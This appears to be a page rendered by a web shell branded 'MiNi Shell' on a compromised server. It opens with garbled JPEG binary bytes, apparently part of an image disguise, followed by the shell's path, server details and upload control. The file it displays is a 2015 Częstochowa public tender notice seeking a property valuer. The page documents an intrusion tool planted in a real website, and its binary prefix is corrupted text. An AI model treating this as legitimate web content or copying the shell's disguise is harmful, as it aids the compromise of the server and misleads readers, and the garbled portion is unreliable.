JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150112/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150112/6154-N-2015.html

<p class="kh_header"><b>Częstochowa: Wybór rzeczoznawcy majątkowego celem sporządzenia operatów szacunkowych</b><br>
<b>Numer ogłoszenia: 6154 - 2015; data zamieszczenia: 12.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór rzeczoznawcy majątkowego celem sporządzenia operatów szacunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sporządzenie operatów szacunkowych dla następujących zadań:
Zadanie I.
Sporządzenie operatu szacunkowego ustalającego wartość nieruchomości gruntowej (gruntu) celem ustanowienia trwałego zarządu na rzecz Miejskiego Zarządu Dróg i Transportu w Częstochowie. - ilość dróg 8 sztuk (1 droga = 1 operat).
Jednostka: operat
Ilość jednostek: 8

Zadanie II.
Sporządzenie operatu szacunkowego ustalającego wartość nieruchomości niezabudowanych (grunt + ewentualne części składowe gruntu) w celu nabycia na rzecz Gminy. W przypadku nieruchomości drogowych ustalenie wartości nieruchomości w celu jej oddania  w trwały zarząd.
Jednostka: działka
Ilość jednostek: 15

Zadanie III.
Sporządzenie operatu szacunkowego nieruchomości stanowiących własność Gminy Miasta Częstochowy w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Jednostka: operat
Ilość jednostek: 150

Zadanie IV.
Sporządzenie operatu szacunkowego nieruchomości stanowiących własność Skarbu Państwa w celu aktualizacji opłaty rocznej z tytułu użytkowania wieczystego.
Jednostka: operat
Ilość jednostek: 36

Zadanie V.
Sporządzenie operatu szacunkowego ustalającego wysokość jednorazowego wynagrodzenia z tytułu ustanowienia służebności gruntowej polegającej na prawie przejazdu, przechodu, przeprowadzenia mediów lub z tytułu ustanowienia służebności przesyłu.
Jednostka: operat 
Ilość jednostek: 15

Zadanie VI.
Sporządzenie operatu szacunkowego w celu wyceny nieruchomości niezabudowanych (grunt + ewentualne części składowe gruntu) w celu ustalenia wartości odszkodowania, (art. 73 u. kompetencyjnej, 98 ugn, 12 specustawy) w drodze decyzji, lub umowy. 
Jednostka: operat
Ilość jednostek: 70

Zadanie VII.
Sporządzenie operatu szacunkowego ustalającego wartość czynszu dzierżawnego nieruchomości gruntowych stanowiących własność Gminy
Jednostka: operat
Ilość jednostek: 10

Zadanie VIII.
Sporządzenie operatu szacunkowego określającego wartość nieruchomości stanowiących własność Skarbu Państwa lub Gminy w celu ustalenia opłaty za przekształcenie prawa użytkowania wieczystego w prawo własności dla nieruchomości składających się:
a.- z 1 działki 
Jednostka: operat
Ilość jednostek: 30
b.- z 2 do 5 działek
Jednostka: operat
Ilość jednostek:15
c. - z 6 i więcej działek 
Jednostka: operat
Ilość jednostek: 5

Zadanie IX
Sporządzenie operatu szacunkowego określającego wartość nieruchomości stanowiących własność Gminy  w celu dokonania zamiany (grunt + ewentualne części składowe gruntu)
Jednostka: operat
Ilość jednostek: 12

Zadanie X. 
Wykonanie operatów szacunkowych określających wysokość wzrostu wartości nieruchomości spowodowanego podziałem nieruchomości na działki w celu naliczenia opłaty adiacenckiej, bądź w przypadku braku tego wzrostu sporządzenie opinii stwierdzających brak wzrostu wartości nieruchomości w wyniku dokonania podziału działki.
W przypadku, gdy opłata w wysokości 20% ustalonego wzrostu wartości nieruchomości nie przekracza kosztów sporządzenia operatu szacunkowego należy wykonać wyżej wymienioną opinię.
W przypadku wykonania opinii wynagrodzenie stanowić będzie 30% kwoty ustalonej za wykonanie operatu szacunkowego.
a)
Sporządzenie 10 operatów szacunkowych dla decyzji zatwierdzających podział nieruchomości, w wyniku których powstało do 4 działek (po podziale) w celu naliczenia opłaty adiacenckiej.
b)
Sporządzenie 10 operatów szacunkowych dla decyzji zatwierdzających podział nieruchomości, w wyniku których powstało od 5 do 10 działek (po podziale) w celu naliczenia opłaty adiacenckiej.
c)
Sporządzenie 6 operatów szacunkowych dla decyzji zatwierdzających podział nieruchomości, w wyniku których powstało od 11 do 40 działek (po podziale) w celu naliczenia opłaty adiacenckiej.


Zadanie XI
Sporządzenie operatu szacunkowego określającego wartość nieruchomości  gruntowej w celu naliczenia opłaty planistycznej.
Jednostka: operat
Ilość jednostek: 5

Zadanie XII
Sporządzenie operatu szacunkowego określającego wartość nieruchomości: 
a) stanowiących własność Skarbu Państwa w celu przekazania w trwały zarząd 
Jednostka: operat
Ilość jednostek: 2
b) stanowiących własność Skarbu Państwa, Gminy  w celu wygaszenia trwałego zarządu
Jednostka: operat
Ilość jednostek: 2
c) stanowiących własność Gminy w celu realizacji roszczeń osób prawnych o oddanie nieruchomości w użytkowanie wieczyste
Jednostka: operat
Ilość jednostek: 2

Zadanie XIII
Wycena nieruchomości Skarbu Państwa podlegających zwrotowi na rzecz byłego właściciela z uwzględnieniem art. 140 ust. 4 ustawy o gospodarce nieruchomościami (wzrostu lub zmniejszenia wartości nieruchomości na skutek działań podjętych na nieruchomości po wywłaszczeniu)
Jednostka: operat
Ilość jednostek: 1

Zadanie XIV 
Sporządzenie operatu szacunkowego określającego  wartość rynkową nieruchomości niezabudowanych w celu :
a) sprzedaży w drodze przetargu  - 25 operatów
b) sprzedaży w drodze bezprzetargowej na poprawę warunków zagospodarowania nieruchomości  sąsiedniej - 25 operatów

Zadanie XV 
Sporządzenie operatu szacunkowego określającego  wartość rynkową nieruchomości niezabudowanych w celu :
a) sprzedaży w drodze przetargu  - 20 operatów
b) sprzedaży w drodze bezprzetargowej na poprawę warunków zagospodarowania nieruchomości  sąsiedniej - 30 operatów

Zadanie XVI 
Sporządzenie operatu szacunkowego ustalającego wartość rynkową nieruchomości zabudowanych :
a) budowlami lub budynkami  o kubaturze do  2 000 m3  - 12 operatów
b) budowlami lub budynkami o kubaturze powyżej 2 000 m3 - 15 operatów

Zadanie XVII
Wykonanie 50 szt. operatów szacunkowych na potrzeby ustalenia wartości rynkowej lokali mieszkalnych wraz z pomieszczeniami do nich przynależnymi i udziałem w częściach wspólnych budynku oraz wartości rynkowej ułamkowej części gruntu przypadającego do tych lokali wraz 
z inwentaryzacją uzyskanie zaświadczenia  o samodzielności lokali położonych na terenie Miasta Częstochowy stanowiących własność Gminy Miasto Częstochowa, przeznaczonych do zbycia na rzecz ich najemców.
W/w ilość lokali do wyceny może ulec zmniejszeniu w okresie obowiązywania umowy 
w zależności od faktycznych potrzeb Zamawiającego wynikających ze zgłoszeń najemców określających chęć ich zakupu.

Zadanie XVIII
Wykonanie 50 szt. operatów szacunkowych na potrzeby ustalenia wartości rynkowej lokali mieszkalnych wraz z pomieszczeniami do nich przynależnymi i udziałem w częściach wspólnych budynku oraz wartości rynkowej ułamkowej części gruntu przypadającego do tych lokali wraz 
z inwentaryzacją uzyskanie zaświadczenia  o samodzielności lokali położonych na terenie Miasta Częstochowy stanowiących własność Gminy Miasto Częstochowa, przeznaczonych do zbycia na rzecz ich najemców.
W/w ilość lokali do wyceny może ulec zmniejszeniu w okresie obowiązywania umowy 
w zależności od faktycznych potrzeb Zamawiającego wynikających ze zgłoszeń najemców określających chęć ich zakupu.

Zadanie XIX
Wykonanie 50 szt. operatów szacunkowych na potrzeby ustalenia wartości rynkowej lokali mieszkalnych wraz z pomieszczeniami do nich przynależnymi i udziałem w częściach wspólnych budynku oraz wartości rynkowej ułamkowej części gruntu przypadającego do tych lokali wraz 
z inwentaryzacją uzyskanie zaświadczenia  o samodzielności lokali położonych na terenie Miasta Częstochowy stanowiących własność Gminy Miasto Częstochowa, przeznaczonych do zbycia na rzecz ich najemców.
W/w ilość lokali do wyceny może ulec zmniejszeniu w okresie obowiązywania umowy 
w zależności od faktycznych potrzeb Zamawiającego wynikających ze zgłoszeń najemców określających chęć ich zakupu..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt 6 ustawy, w wysokości nie większej niż 50%.
Wykonawca, któremu zostanie udzielone zamówienie podstawowe zobowiązany będzie do zastosowania w zamówieniach uzupełniających cen jednostkowych nie wyższych niż zastosowane w zamówieniu podstawowym. 
Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających: wykonanie operatów szacunkowych określonych w zadaniach I, II, III, V, VI, VIII, X, XIII, XIV, XV, XVI, XVII, XVIII.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy udokumentują wykonanie usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem nazwy  zamawiającego, przedmiotu i wartości usług (ilości operatów szacunkowych), dat wykonania, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane należycie - polegających na wykonaniu: 5 szt. operatów szacunkowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy dysponują co najmniej  jedną  osobą   zdolną  do  wykonania zamówienia posiadającą uprawnienia zawodowe w zakresie szacowania nieruchomości</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy posiadają ubezpieczenie   od   odpowiedzialności   cywilnej w     zakresie    prowadzonej   działalności   związanej  z    przedmiotem  zamówienia na kwotę nie  mniejszą niż 25 tys. Euro</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie   złożone   w   ofercie,   że   Wykonawca   nie   zalega   z   opłacaniem podatków,  opłat   oraz   składek    na   ubezpieczenie zdrowotne   i   społeczne     lub że   uzyskał   przewidziane   prawem   zwolnienie,   odroczenie   lub  rozłożenie   na raty zaległych  płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Wymagania dotyczące dokumentów, określonych w punktach od 6.1. do 6.4. specyfikacji.
Dokumenty o których mowa w punktach 6.1.d), 6.2.a) i 6.3.a) winny być złożone w oryginale. Dokumenty o których mowa w punktach 6.1.b),  6.3.b) i 6.4.a)  winny być złożone w oryginale lub kopii. Kopia dla dokumentu o którym mowa w punkcie pkt. 6.1b) i 6.4.a) musi być poświadczona za zgodność z oryginałem przez (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. 
W przypadku składania oferty wspólnej przez kilku przedsiębiorców (tzw. konsorcjum) lub przez spółkę cywilną, każdy ze wspólników musi złożyć dokumenty wymienione w punkcie 6.1. specyfikacji (lub w punkcie 6.5.2. specyfikacji - jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej) wraz z dokumentami wymienionymi w punktach 6.1.a), 6.1.c) i 6.1.d) SIWZ). Pozostałe dokumenty będą traktowane jako wspólne. Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego. 
 
6.5.4.Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia oraz zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
W przypadku Wykonawców wspólnie ubiegających się o zamówienie  oraz 
w przypadku, gdy Wykonawca wykazując spełnianie warunków, o których mowa w pkt. 5.2,5.3 i 5.4. SIWZ polega na zasobach innych podmiotów, kopie dokumentów potwierdzających spełnianie warunków, dotyczących odpowiednio wspólników konsorcjum lub innych podmiotów, powinny być poświadczone za zgodność z oryginałem przez wspólników konsorcjum (każdy w odniesieniu do dotyczących go dokumentów) lub przez pełnomocnika konsorcjum jeżeli będzie miał do tej czynności upoważnienie a w odniesieniu do innych podmiotów przez upoważnionych przedstawicieli tych podmiotów (każdy w odniesieniu do dotyczących go dokumentów).
wypełniony w formie oryginału druk Oferta, stanowiący załącznik nr 1 do specyfikacji, zawierający oświadczenie, że wykonawca spełnia wszystkie warunki określone w specyfikacji istotnych warunków zamówienia oraz w art. 22 ust. 1 ustawy Prawo zamówień publicznych, a także informację, czy wykonawca należy/nie należy do grupy kapitałowej. 
Uwaga:
Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy, to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kserokopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wynagrodzenie zostanie zmienione w przypadku urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT.
2. Przewiduje się zmianę terminu realizacji zlecenia na pisemny wniosek rzeczoznawcy w terminie wnioskowanym przez rzeczoznawcę, lecz nie dłuższym niż 30 dni kalendarzowych w przypadku braku możliwości dostępu do wycenianej działki/budynku/lokalu lub uzasadnionych trudności ( np. uzyskanie niezbędnych dokumentów związanych z realizacją zlecenia) niezależnych od Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> mn@czestochowa.um.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2015 godzina 10:00, miejsce: Biuro Obsługi Interesanta, parter, stanowisko  Wydziału Nadzoru i Administracji, ul. Śląska 11/13, 42-217 Częstochowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Specyfikacja Istotnych Warunków Zamówienia będzie dostępna  na stronie interenetowej Zamawiającego: http://bip.czestochowa.pl. Na tej stronie Zamawiający będzie również zamieszczał pytania i odpowiedzi, modyfikacje SIWZ, odwołania dot. treści ogłoszenia oraz postanowień specyfikacji istotnych warunków zamówienia, ogłoszenie o wyborze najkorzystniejszej oferty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com